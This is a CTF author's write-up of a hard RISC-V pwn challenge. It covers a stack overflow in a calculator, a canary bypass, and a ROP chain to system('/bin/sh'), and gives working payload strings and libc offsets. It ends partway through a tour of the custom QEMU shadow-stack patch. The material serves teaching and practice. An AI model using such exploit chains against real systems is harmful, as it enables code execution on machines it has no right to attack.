ECW 2023: The Calculator in Shadow (write-up)

This year again, Thalium took part in organizing the European Cyber Week CTF qualifiers, as well as designing several challenges in our core competencies.

For this occasion, I came up with a hard pwn challenge titled The Calculator in Shadow.

It focused on the low-level exploitation of a RISC-V program using a stack overflow vulnerability, but with a twist: the program was run on top of a customized QEMU user-mode emulator, which added a poorly implemented shadow stack protection.

Only 5 participants managed to solve it. In this write-up I will describe the challenge from my point of view as the author.

Introduction

The challenge’s description was the following:

The players were also given:

the QEMU patch;
the calculator source code;
a tiny Binutils patch to be able to compile the new instructions;
a RISC-V sysroot;
a docker with all build and debug tools already setup.

You can retrieve all these files here.

Now for the solution, the players were expected to:

Understand that the QEMU patch is implementing a shadow stack, since they weren’t explicitly aware of it, despite the small hint in the title and introduction.
Find a buffer overflow vulnerability in the calculator and exploit it.
Bypass the shadow stack.
Enjoy flagging.

If you’re not familiar with RISC-V, you can get a quick glance of it through this RISC-V card.

The calculator’s vulnerability

A Makefile was made available with the calculator’s source. In particular, one could use the command make sunbath to recompile everything without the shadow stack custom instructions.

The calculator was a small program that I implemented with this architecture:

main.c asks for an input amounting to a maximum of 127 bytes.
The input then undergoes lexical and syntactic analysis through flex and bison, resulting in an AST. The tokens were described in the file ast.l and the grammar in ast.y.
At this point it is possible to dump the AST for debugging purposes if the calculator was launched with the -d option. The logic for this lies in debug.c.
The functions in calc.c handle traveling throughout the AST and computing the calculation along the way.
Finally, the result is printed, and the program terminates.

The AST is composed of two types of nodes:

Number nodes which are the leaf nodes of the tree. During the parsing, these nodes are given a value.
Binary operations node which have 2 children. The supported operations are the arithmetic addition, subtraction, multiplication, division, and the power function. During the parsing, these nodes are given an id in the order they are created. Due to this process, a node with precedence over another will have a lower id.

This organization is illustrated by this simple AST:

$ calculator -d
>> 1*(2+3)

| kind = NODE_TIMES
| id = 1
| 
| left:
| 
|  | kind = NODE_NUMBER
|  | value = 1
| 
| right:
| 
|  | kind = NODE_PLUS
|  | id = 0
|  | 
|  | left:
|  | 
|  |  | kind = NODE_NUMBER
|  |  | value = 2
|  | 
|  | right:
|  | 
|  |  | kind = NODE_NUMBER
|  |  | value = 3
|  | 
| 

Result: 5

The stack overflow vulnerability is present during the calculation process so let’s take a closer look to the core of the calculation phase:

// in file calc.c

error_kind calc (node_t* node_root, int64_t* result) {
  IN_SHADOW

  int64_t results[MAX_OPS];
  bool completed[MAX_OPS];

  memzero(results, sizeof(int64_t) * MAX_OPS);
  memzero(completed, sizeof(bool) * MAX_OPS);

  if (node_root->kind == NODE_NUMBER) {
    *result = node_root->content.value;
    return ERROR_NO_ERROR;
  }

  error_kind err = dispatch(node_root, results, completed);
  if (err != ERROR_NO_ERROR) {
    return err;
  }

  *result = results[node_root->content.binop.id];
  return ERROR_NO_ERROR;
}

Here the dispatch function will scan the AST recursively, starting from the root node, with a depth-first approach. Each binary operation node encountered along the way will have its result stored in the results array indexed by the node’s id. The result will then be used to compute upper nodes. To keep tracks of the already computed nodes the completed array is used.

Since MAX_OPS is a constant fixed to 16 we can overflow the arrays by performing a calculation that holds more than 16 operations.

However, it is not so easy to do so, since the secure_calc function that is responsible for calling calc performs a few checks beforehand:

error_kind secure_calc (char input[], node_t* node_root, int64_t* result) {
  IN_SHADOW

  if (MAX_OPS < count_ops(input)) {
    return ERROR_OPS_LIMIT;
  }

  return calc(node_root, result);
}

uint8_t count_ops (char input[]) {
  IN_SHADOW

  uint8_t count = 0;
  uint8_t i = 0;
  char c;

  do {
    c = input[i++];

    if (c == '+' || c == '-' || c == '/') {
      count++;
    } else if (c == '*') {
      count++;

      if (input[i] == '*') {
        i++;
      }
    }

  } while (c != '\0');

  return count;
}

We succeed if we can make count_ops return a wrong result. A way could be to overflow the count variable which is only an uint8_t. However, in our case this approach is a bit of a bait since the input collected by main cannot exceed 127 bytes.

The real flaw of this function lies in the way it counts the operations: parentheses are not considered. Yet, implicit multiplication, in the form (a)(b) is allowed by the grammar in ast.y:

purefactor  : LPARENTHESIS expression RPARENTHESIS            { $$ = $2; }
            | LPARENTHESIS expression RPARENTHESIS purefactor { $$ = node_new(NODE_TIMES, $2, $4); }
            ;

To test the vulnerability let’s write 17 (1) together to form 16 (1)(1) implicit multiplications:

>> (1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)

*** stack smashing detected ***: terminated
Aborted (core dumped)

We overflow the results array by a single int64_t: this directly overwrites the stack canary.

Actually, the vulnerability could be hinted at due to rather contrived patterns of code in the calculator:

results could have been stored directly in the AST instead of an array;
count_ops could have scanned the AST to count directly the nodes;
count_ops is not even necessary if we use the counting done during the AST building process.

Bypassing the canary

Since we’re using QEMU user-mode emulation, ASLR is disabled. Other standard binary protections have also been kept low:

Arch:     riscv64-64-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x10000)

Since NX is enabled, we want to use ROP, and the stack canary is the main barrier preventing us from doing so.

Or goal is to overwrite the return address of calc without modifying the canary. The stack frame of this function is organized in the following manner:

Here is what the stack looks like in more details for a legitimate calculation (1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1) which fills the result array with ones, towards the end of the function before it returns so that both the results and completed array are filled:

The key idea to bypassing the canary is to notice that since the completed and results are placed next to each over, the completed array overflows into the results the same way the latter overflows into the canary.

The computation for node 0, written at the beginning of the results array, will overlap with the values 16 to 23 of the completed array.

Therefore, we can craft a payload like the following:

(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(0+1-1)+(0*0*0+1311768465173141112)

Where:

(0+1-1) is the first calculation being made. 0+1 yields the result 0x0000000000000001, putting 0x01 in completed[16] to avoid overwriting the stack canary in results[16]. The remaining of the completed array is then filled with zeros.
0*0*0 is used for skipping the canary and obtaining results[17] = results[16] * 0, thus ensuring the value in results[17] is zero even if we do not know results[16].
1311768465173141112 corresponds to 0x1234567812345678, thanks to the preceding results[18] = results[17] + 0x1234567812345678 = 0 + 0x1234567812345678.

Here is what the stack looks like with the new payload and the overlapping arrays:

We can verify the bypass succeeded with a debugger:

Program received signal SIGSEGV, Segmentation fault.
0x1234567812345678 in ?? ()

One of the subtleties to consider here was to ensure that completed[16] is overwritten before it is read. The event order is indeed not that trivial and is determined by the dispatch function:

error_kind dispatch (node_t* node, int64_t results[], bool completed[]) {
  IN_SHADOW

  error_kind err;

  if (get_completion(node, completed)) {
    return ERROR_NO_ERROR;
  }

  node_t *node_l = node->content.binop.node_l;
  if (!get_completion(node_l, completed)) {
    err = dispatch(node_l, results, completed);
    if (err != ERROR_NO_ERROR) {
      return err;
    }
  }

  node_t *node_r = node->content.binop.node_r;
  if (!get_completion(node_r, completed)) {
    err = dispatch(node_r, results, completed);
    if (err != ERROR_NO_ERROR) {
      return err;
    }
  }

  // [...] The node calculation is handled here
}

This function follows this scheme:

The value in completed for the parent node is verified. If it is not zero, both the node and its children will not be computed.
The value in completed for the left child node is verified, then the node is computed accordingly.
The value in completed for the right child node is verified, then the node is computed accordingly.
The parent node is computed.

We want results[0] (and therefore completed[16]) to be computed before the check for completed[16] is done. Referring to the scheme we just detailed, it is possible to achieve this if there is an ancestor for which node 0 is in the left child descendants, and for which node 16 is in the right child descendants.

We can verify that the submitted calculation had the desired behavior by dumping the AST.

calculator -d
>>> (1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(0+1-1)+(0*0*0+1311768465173141112)

| kind = NODE_PLUS
| id = 19
| 
| left:
| 
|  | kind = NODE_TIMES
|  | id = 15
|  | 
|  | left:
|  | 
|  |  | kind = NODE_NUMBER
|  |  | value = 1
|  | 
|  | right:
|  | 
|  |  | kind = NODE_TIMES
|  |  | id = 14
|  |  | 
|  |  | left:
|  |  | 
|  |  |  | kind = NODE_NUMBER
|  |  |  | value = 1
|  |  | 
|  |  | right:
|  |  | 
|  |  |  | kind = NODE_TIMES
|  |  |  | id = 13
|  |  |  | 

[...] The pattern repeats

|  |  |  |  |  |  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  |  |  |  |  |  |  | right:
|  |  |  |  |  |  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  |  |  |  |  |  |  |  | kind = NODE_TIMES
|  |  |  |  |  |  |  |  |  |  |  |  |  |  | id = 2
|  |  |  |  |  |  |  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  |  |  |  |  |  |  |  | left:
|  |  |  |  |  |  |  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | kind = NODE_NUMBER
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | value = 1
|  |  |  |  |  |  |  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  |  |  |  |  |  |  |  | right:
|  |  |  |  |  |  |  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | kind = NODE_MINUS
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | id = 1
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | left:
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | kind = NODE_PLUS
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | id = 0
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | left:
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | kind = NODE_NUMBER
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | value = 0
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | right:
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | kind = NODE_NUMBER
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | value = 1
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | right:
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | kind = NODE_NUMBER
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | value = 1
|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  |  | 
|  |  |  |  |  |  |  | 
|  |  |  |  |  |  | 
|  |  |  |  |  | 
|  |  |  |  | 
|  |  |  | 
|  |  | 
|  | 
| 
| right:
| 
|  | kind = NODE_PLUS
|  | id = 18
|  | 
|  | left:
|  | 
|  |  | kind = NODE_TIMES
|  |  | id = 17
|  |  | 
|  |  | left:
|  |  | 
|  |  |  | kind = NODE_TIMES
|  |  |  | id = 16
|  |  |  | 
|  |  |  | left:
|  |  |  | 
|  |  |  |  | kind = NODE_NUMBER
|  |  |  |  | value = 0
|  |  |  | 
|  |  |  | right:
|  |  |  | 
|  |  |  |  | kind = NODE_NUMBER
|  |  |  |  | value = 0
|  |  |  | 
|  |  | 
|  |  | right:
|  |  | 
|  |  |  | kind = NODE_NUMBER
|  |  |  | value = 0
|  |  | 
|  | 
|  | right:
|  | 
|  |  | kind = NODE_NUMBER
|  |  | value = 1311768465173141112
|  | 
|

In this AST:

node 0 is a descendant of node 15, the left child of node 19 (also the root node);
node 16 is a descendant of node 18, the right child of node 19;
node 16 has no descendants: since node 16 is not computed its descendants will neither so it is easier if it doesn’t have any.

Again, a hint to this bug was that the code pattern used here is still a bit contrived. A completed array is not really useful if we can travel the tree while visiting each node once and only once. Moreover, the implementation here was already doing this!

It’s ROP time

Since the beginning of the year, ROPGadget has added support for RISCV-64, so we can make use of it.

A simple search on the challenge’s libc yields loads of results:

$ ROPgadget --binary build/sysroot/lib/libc.so.6

Unique gadgets found: 286370

Removing system and JOP gadgets outputs a more reasonable amount:

$ ROPgadget --nosys --nojop --binary build/sysroot/lib/libc.so.6

Unique gadgets found: 5360

RISC-V leaf functions don’t usually push and pop the ra register from the stack, but rather leave it intact. To avoid such functions, we can restrict our search to gadgets that actually do something with the register (hopefully popping it from the stack):

$ ROPgadget --nosys --nojop --re "ra.+" --binary build/sysroot/lib/libc.so.6

Unique gadgets found: 584

Analyzing the results shows that a lot of the libc gadgets use condensed instructions: such instructions are 16-byte RISC-V instruction for common operations, as opposed to the classic 32-byte RISC-V instructions. Their purpose is to reduce code size.

In particular, here we can look for the c.ldsp instruction which expands to a stack pointer-relative ld instruction, that is to say a load operation from the stack.

A search focusing on loading the ra and a0 (first argument) registers yields:

$ ROPgadget --nosys --nojop --binary build/sysroot/lib/libc.so.6 | grep "c.ldsp ra" | grep "c.ldsp a0"

0x000000000005d5f2 : c.addi ra, 0x1d ; c.ldsp a0, 8(sp) ; c.ldsp ra, 0x18(sp) ; c.addi16sp sp, 0x20 ; c.jr ra
0x00000000000b4544 : c.addi4spn s0, sp, 0x358 ; c.ldsp ra, 0x28(sp) ; c.ldsp a0, 0x18(sp) ; c.addi16sp sp, 0x30 ; c.jr ra
0x000000000003b2fe : c.addi4spn s0, sp, 0x44 ; c.ldsp ra, 0x18(sp) ; c.ldsp a0, 8(sp) ; c.addi16sp sp, 0x20 ; c.jr ra
0x000000000003b42e : c.ld s0, 0x48(a2) ; c.ldsp ra, 0x18(sp) ; c.ldsp a0, 8(sp) ; c.addi16sp sp, 0x20 ; c.jr ra
0x000000000003908a : c.ldsp a0, 0x98(sp) ; c.ldsp ra, 0x138(sp) ; c.addi16sp sp, 0x140 ; c.jr ra
0x000000000005d5f4 : c.ldsp a0, 8(sp) ; c.ldsp ra, 0x18(sp) ; c.addi16sp sp, 0x20 ; c.jr ra
0x000000000003b300 : c.ldsp ra, 0x18(sp) ; c.ldsp a0, 8(sp) ; c.addi16sp sp, 0x20 ; c.jr ra
0x00000000000e66bc : c.ldsp ra, 0x18(sp) ; c.ldsp s0, 0x10(sp) ; c.ldsp a0, 8(sp) ; c.addi16sp sp, 0x20 ; c.jr ra
0x00000000000b4546 : c.ldsp ra, 0x28(sp) ; c.ldsp a0, 0x18(sp) ; c.addi16sp sp, 0x30 ; c.jr ra
0x0000000000039088 : c.nop ; c.ldsp a0, 0x98(sp) ; c.ldsp ra, 0x138(sp) ; c.addi16sp sp, 0x140 ; c.jr ra

Let’s use this gadget: 0x000000000005d5f4 : c.ldsp a0, 8(sp) ; c.ldsp ra, 0x18(sp) ; c.addi16sp sp, 0x20 ; c.jr ra.

Our target ra will be the address of the system function. We find that it is located at offset 0x45688 relative to the libc base:

$ nm -gD riscv/sysroot/lib/libc.so.6 | grep system
0000000000045688 T __libc_system@@GLIBC_PRIVATE
00000000000e14e8 T svcerr_systemerr@GLIBC_2.27
0000000000045688 W system@@GLIBC_2.27

Our target a0 will be the /bin/sh string. We find that it is located at offset 0x1086c8 relative to the libc base:

$ ROPgadget --string "/bin/sh" --binary build/sysroot/lib/libc.so.6
Strings information
============================================================
0x00000000001086c8 : /bin/sh

Now since the address space is fixed for this binary let’s use a debugger to dump it:

pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
       Start                End Perm     Size Offset File
     0x10000            0x16000 r-xp     6000      0 /home/challenger/calculator/build/bin/calculator
     0x16000            0x17000 rw-p     1000   6000 /home/challenger/calculator/build/bin/calculator
0x40007ff000       0x4000820000 rw-p    21000      0 [stack]
0x4000801000       0x400081d000 r-xp    1c000      0 [linker]
0x4000801000       0x400081d000 r-xp    1c000      0 /home/challenger/riscv/sysroot/lib/ld-linux-riscv64-lp64d.so.1
0x400081d000       0x400081f000 rw-p     2000  1c000 [linker]
0x400081d000       0x400081f000 rw-p     2000  1c000 /home/challenger/riscv/sysroot/lib/ld-linux-riscv64-lp64d.so.1
0x4000824000       0x4000955000 rw-p   131000      0 <explored>

Here the libc mapping starts at 0x4000824000 and corresponds to the last line. However, it is not really obvious due to limitations of QEMU’s gdb stub. We can confirm the address by looking directly at the mappings in /proc/maps:

$ pgrep qemu
715

$ cat /proc/715/maps | grep libc
4000824000-4000941000 r--p 00000000 fe:02 10511477                       /home/challenger/riscv/sysroot/lib/libc.so.6
4000941000-4000944000 r--p 0011d000 fe:02 10511477                       /home/challenger/riscv/sysroot/lib/libc.so.6
4000944000-4000946000 rw-p 00120000 fe:02 10511477                       /home/challenger/riscv/sysroot/lib/libc.so.6
7f9a67e38000-7f9a67e60000 r--p 00000000 fe:02 10009775                   /usr/lib/x86_64-linux-gnu/libc.so.6
7f9a67e60000-7f9a67ff5000 r-xp 00028000 fe:02 10009775                   /usr/lib/x86_64-linux-gnu/libc.so.6
7f9a67ff5000-7f9a6804d000 r--p 001bd000 fe:02 10009775                   /usr/lib/x86_64-linux-gnu/libc.so.6
7f9a6804d000-7f9a68051000 r--p 00214000 fe:02 10009775                   /usr/lib/x86_64-linux-gnu/libc.so.6
7f9a68051000-7f9a68053000 rw-p 00218000 fe:02 10009775                   /usr/lib/x86_64-linux-gnu/libc.so.6

There are 2 libc mappings: the x86 one for QEMU and the RISC-V one for the emulated program.

We can use the computation to fill the stack with the values that then will be popped by the gadget. Since these values are the results of operations, we need to compute each value relatively to the preceding one:

Name	Offset in libc	Absolute address	Hex => Int	Relative to precedent
Gadget	`0x5d5f4`	`0x40008815f4`	274886825460	+274886825460
`/bin/sh`	`0x1086c8`	`0x400092c6c8`	274887526088	+700628
`system()`	`0x45688`	`0x4000869688`	274886727304	-798784

Putting all these together we can finally get a shell with:

(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(0+1-1)+(0*0*0+274886825460+0+700628+0-798784)

The shady QEMU patch

The challenge is not yet finished!

Up until now we were working on the calculator without the custom instructions implemented by the provided QEMU patch. If we use the original calculator with our previous payload, we don’t get a shell, but a shadow exception:

================================================
Shadow exception triggered!
(Conveniently handled as an illegal instruction)

The current dark page is 0x0000004000955000
The current dark offset is 0x8
================================================

Illegal instruction (core dumped)

This exception comes from the shadow stack mechanism that was added by the patch.

In brief: a special stack is created only to store return addresses. During return instructions, the address stored in the register (often popped from the classic stack prior to that) is compared with the one on the shadow stack to ensure it was not tampered with.

The challengers didn’t initially know the patch was implementing a shadow stack and had to figure it out. As for this write-up, I will instead give a quick tour of the code.

diff --git a/target/riscv/cpu.c b/target/riscv/cpu.c
index 1e97473af2..fef657cc88 100644
--- a/target/riscv/cpu.c
+++ b/target/riscv/cpu.c
@@ -131,6 +131,7 @@ static const struct isa_ext_data isa_edata_arr[] = {
     ISA_EXT_DATA_ENTRY(xtheadmempair, true, PRIV_VERSION_1_11_0, ext_xtheadmempair),
     ISA_EXT_DATA_ENTRY(xtheadsync, true, PRIV_VERSION_1_11_0, ext_xtheadsync),
     ISA_EXT_DATA_ENTRY(xventanacondops, true, PRIV_VERSION_1_12_0, ext_XVentanaCondOps),
+    ISA_EXT_DATA_ENTRY(xishadow, true, PRIV_VERSION_1_12_0, ext_xishadow),
 };
 
 static bool isa_ext_is_enabled(RISCVCPU *cpu,
@@ -1528,6 +1529,9 @@ static Property riscv_cpu_properties[] = {
      * it with -x and default to 'false'.
      */
     DEFINE_PROP_BOOL("x-misa-w", RISCVCPU, cfg.misa_w, false),
+
+    DEFINE_PROP_BOOL("xishadow", RISCVCPU, cfg.ext_xishadow, true),
+
     DEFINE_PROP_END_OF_LIST(),
 };

These lines are used to define a new RISC-V extension.

As per RISC-V extensions naming convention (See RISC-V Unprivileged Specification, chapter 29), the extension’s name starts with an x, indicating a non-standard user-level extension. I then added an i to highlight that the added instructions are close to the ones in the base integer instruction set, but the spec doesn’t actually require this.

diff --git a/target/riscv/cpu.h b/target/riscv/cpu.h
index 638e47c75a..cbdba0bc64 100644
--- a/target/riscv/cpu.h
+++ b/target/riscv/cpu.h
@@ -383,6 +383,9 @@ struct CPUArchState {
     uint64_t kvm_timer_compare;
     uint64_t kvm_timer_state;
     uint64_t kvm_timer_frequency;
+
+    target_ulong dark_page;
+    uint16_t dark_offset;
 };
diff --git a/target/riscv/cpu_bits.h b/target/riscv/cpu_bits.h
index fca7ef0cef..f930db99e4 100644
--- a/target/riscv/cpu_bits.h
+++ b/target/riscv/cpu_bits.h
@@ -523,6 +523,10 @@
 /* Crypto Extension */
 #define CSR_SEED            0x015
 
+/* Shadow Extension */
+#define CSR_DARKPAGE        0x01a
+#define CSR_DARKOFF         0x01b
+
 /* mstatus CSR bits */
 #define MSTATUS_UIE         0x00000001
 #define MSTATUS_SIE         0x00000002
@@ -677,6 +681,7 @@ typedef enum RISCVException {
     RISCV_EXCP_LOAD_GUEST_ACCESS_FAULT = 0x15,
     RISCV_EXCP_VIRT_INSTRUCTION_FAULT = 0x16,
     RISCV_EXCP_STORE_GUEST_AMO_ACCESS_FAULT = 0x17,
+    RISCV_EXCP_SHADOW = 0x18,
 } RISCVException;
 
 #define RISCV_EXCP_INT_FLAG                0x80000000

The CPUArchState is then modified to add 2 CSRs (Control and Status Register, see RISC-V Unprivileged Specification, chapter 11, and RISC-V Privileged Specification, chapter 2):

dark_page: it stores the base address of the shadow stack;
dark_offset: it stores the current offset in the shadow stack. It is stored as an uint16_t only.

We also define the CPU bits for these registers and a new exception.

diff --git a/target/riscv/csr.c b/target/riscv/csr.c
index 736ab64275..b81420f0e3 100644
--- a/target/riscv/csr.c
+++ b/target/riscv/csr.c
@@ -550,6 +550,14 @@ static RISCVException seed(CPURISCVState *env, int csrno)
 #endif
 }
 
+static RISCVException shadow(CPURISCVState *env, int csrno)
+{
+    if (!riscv_cpu_cfg(env)->ext_xishadow) {
+        return RISCV_EXCP_ILLEGAL_INST;
+    }
+    return RISCV_EXCP_NONE;
+}
+
 /* User Floating-Point CSRs */
 static RISCVException read_fflags(CPURISCVState *env, int csrno,
                                   target_ulong *val)
@@ -3995,6 +4003,36 @@ RISCVException riscv_csrrw_debug(CPURISCVState *env, int csrno,
     return ret;
 }
 
+/* Shadow */
+
+static RISCVException read_dark_page(CPURISCVState *env, int csrno,
+                                     target_ulong *val)
+{
+    *val = env->dark_page;
+    return RISCV_EXCP_NONE;
+}
+
+static RISCVException write_dark_page(CPURISCVState *env, int csrno,
+                                      target_ulong val)
+{
+    env->dark_page = val;
+    return RISCV_EXCP_NONE;
+}
+
+static RISCVException read_dark_offset(CPURISCVState *env, int csrno,
+                                       target_ulong *val)
+{
+    *val = (target_ulong) env->dark_offset;
+    return RISCV_EXCP_NONE;
+}
+
+static RISCVException write_dark_offset(CPURISCVState *env, int csrno,
+                                        target_ulong val)
+{
+    env->dark_offset = (uint16_t)(val & 0xFFFF);
+    return RISCV_EXCP_NONE;
+}
+
 /*
  * Control and Status Register function table
  * riscv_csr_operations::predicate() must be provided for an implemented CSR
@@ -4028,6 +4066,10 @@ riscv_csr_operations csr_ops[CSR_TABLE_SIZE] = {
     /* Crypto Extension */
     [CSR_SEED] = { "seed", seed, NULL, NULL, rmw_seed },
 
+    /* Shadow Extension */
+    [CSR_DARKPAGE] = {"vdarkpage", shadow, read_dark_page, write_dark_page},
+    [CSR_DARKOFF]  = {"vdarkoff", shadow, read_dark_offset, write_dark_offset},
+
 #if !defined(CONFIG_USER_ONLY)
     /* Machine Timers and Counters */
     [CSR_MCYCLE]    = { "mcycle",    any,   read_hpmcounter,

Here we define the shadow function that checks if the extension is enabled, and getters and setters for the registers we just added.

The line env->dark_offset = (uint16_t)(val & 0xFFFF); highlights how unnatural it was to choose an uint16_t for the dark_offset register. The ability to perform on integer overflow on the dark_offset is indeed the main weakness of this shadow stack.

diff --git a/target/riscv/insn32.decode b/target/riscv/insn32.decode
index 73d5d1b045..1a6c9d881e 100644
--- a/target/riscv/insn32.decode
+++ b/target/riscv/insn32.decode
@@ -908,3 +908,8 @@ sm4ks       .. 11010 ..... ..... 000 ..... 0110011 @k_aes
 # *** RV32 Zicond Standard Extension ***
 czero_eqz   0000111  ..... ..... 101 ..... 0110011 @r
 czero_nez   0000111  ..... ..... 111 ..... 0110011 @r
+
+# *** Shadow Extension ***
+@shadow     .......  ..... ..... ... ..... ....... %rs1
+dusk        0000000  00000 ..... 000 00000 0001011 @shadow
+obscure     0000000  00000 ..... 001 00000 0001011 @shadow

This file defines the instructions decoding through QEMU decodetree. We can read the patterns of the added I-type instructions as:

Name	Immediate	Immediate	rs1	funct3	rd	opcode
Bits position	31 - 25	24 - 20	19 - 15	14 - 12	11 - 7	6 - 0
dusk	0000000	00000	any	000	00000	0001011
obscure	0000000	00000	any	001	00000	0001011

2 new instructions are added: dusk and obscure. They don’t use the destination register (rd) nor the immediate, hence we require them filled with zeros. Only the 1st source register (rs1) is collected.

For our two instructions we use the major opcode 0001011 which is left empty as custom-0 (see RISC-V Unprivileged Specification, table 27.1 and chapter 28), then we differentiate them using the minor opcode in funct3.

diff --git a/target/riscv/insn_trans/trans_shadow.c.inc b/target/riscv/insn_trans/trans_shadow.c.inc
new file mode 100644
index 0000000000..8d98f413bb
--- /dev/null
+++ b/target/riscv/insn_trans/trans_shadow.c.inc
@@ -0,0 +1,27 @@
+static bool trans_dusk(DisasContext *ctx, arg_dusk *a)
+{
+    TCGv_i32 csr_darkpage = tcg_constant_i32(CSR_DARKPAGE);
+    gen_helper_csrw(cpu_env, csr_darkpage, get_gpr(ctx, a->rs1, EXT_NONE));
+
+    TCGv_i32 csr_darkoff = tcg_constant_i32(CSR_DARKOFF);
+    TCGv zero = tcg_constant_tl(0);
+    gen_helper_csrw(cpu_env, csr_darkoff, zero);
+
+    return true;
+}
+
+static bool trans_obscure(DisasContext *ctx, arg_obscure *a)
+{
+    TCGv dark_offset = tcg_temp_new();
+    TCGv_i32 csr_darkoff = tcg_constant_i32(CSR_DARKOFF);
+    gen_helper_csrr(dark_offset, cpu_env, csr_darkoff);
+    TCGv darkest_address = get_darkest_address(ctx, dark_offset);
+
+    TCGv saved_data = get_gpr(ctx, a->rs1, EXT_NONE);
+    tcg_gen_qemu_st_tl(saved_data, darkest_address, ctx->mem_idx,
+                       MO_ALIGN | MO_TE | size_memop(get_xlen_bytes(ctx)));
+
+    tcg_gen_addi_tl(dark_offset, dark_offset, get_xlen_bytes(ctx));
+    gen_helper_csrw(cpu_env, csr_darkoff, dark_offset);
+    return true;
+}
diff --git a/target/riscv/translate.c b/target/riscv/translate.c
index 0ee8ee147d..26db5b6f1a 100644
--- a/target/riscv/translate.c
+++ b/target/riscv/translate.c
@@ -156,6 +156,12 @@ static inline int __attribute__((unused)) get_xlen(DisasContext *ctx)
     return 16 << get_xl(ctx);
 }
 
+/* The word size for this machine mode, in bytes. */
+static inline int __attribute__((unused)) get_xlen_bytes(DisasContext *ctx)
+{
+    return get_xlen(ctx) >> 3;
+}
+
 /* The operation length, as opposed to the xlen. */
 #ifdef TARGET_RISCV32
 #define get_ol(ctx)    MXL_RV32
@@ -1069,6 +1075,18 @@ static uint32_t opcode_at(DisasContextBase *dcbase, target_ulong pc)
     return cpu_ldl_code(env, pc);
 }
 
+static TCGv get_darkest_address(DisasContext *ctx, TCGv dark_offset)
+{
+    TCGv dark_page = tcg_temp_new();
+    TCGv_i32 csr_darkpage = tcg_constant_i32(CSR_DARKPAGE);
+    gen_helper_csrr(dark_page, cpu_env, csr_darkpage);
+
+    TCGv darkest_address = tcg_temp_new();
+    tcg_gen_add_tl(darkest_address, dark_page, dark_offset);
+
+    return darkest_address;
+}
+
 /* Include insn module translation function */
 #include "insn_trans/trans_rvi.c.inc"
 #include "insn_trans/trans_rvm.c.inc"
@@ -1094,6 +1112,9 @@ static uint32_t opcode_at(DisasContextBase *dcbase, target_ulong pc)
 /* Include decoders for factored-out extensions */
 #include "decode-XVentanaCondOps.c.inc"
 
+/* Include Shadow extension */
+#include "insn_trans/trans_shadow.c.inc"
+
 /* The specification allows for longer insns, but not supported by qemu. */
 #define MAX_INSN_LEN  4

In these files lies the logic for the new instructions. They rely on TCG (Tiny Code Generator), the intermediate language QEMU uses for emulation. What is modified here is part of the TCG front-end for RISC-V, meaning they define how to translate guest RISC-V instructions to TCG operations.

In a next stage, TCG operations are optimized and finally translated to the host instruction set using the corresponding TCG backend. We do not alter this part of QEMU in the challenge.

The first instruction, dusk, is rather short. It relies on gen_helper_csrw, which is a helper function handling the generation of the necessary TCG operations for a CSR write.

Here is the operation translated into pseudo-code, with the GPRs (General Purpose Register) and CPRs seen as lists:

// dusk rs1

CSR[dark_page] = GPR[rs1]; // gen_helper_csrw (CSR write)
CSR[dark_offset] = 0; // gen_helper_csrw

The instruction initializes the shadow stack, taking the base address from the content of the register rs1. The offset is set to 0, “pointing” to the first cell of the stack, currently empty.

In the calculator, this instruction is accordingly called only once, in the function blue_hour at the start of main:

void blue_hour (void) {
  #ifndef SUNBATH
  void *page = mmap(NULL, 64 * 1024, PROT_READ | PROT_WRITE,
                    MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);
  if (page == MAP_FAILED) {
    error(ERROR_DUSK_MMAP);
  }

  asm volatile(
    "dusk %0"
    :
    : "r" (page)
  );
  #endif
}

The function only does a mmap then forwards the returned address to the dusk instruction. In this shadow stack implementation, the memory region hosting the shadow stack is thus allocated directly by the protected program.

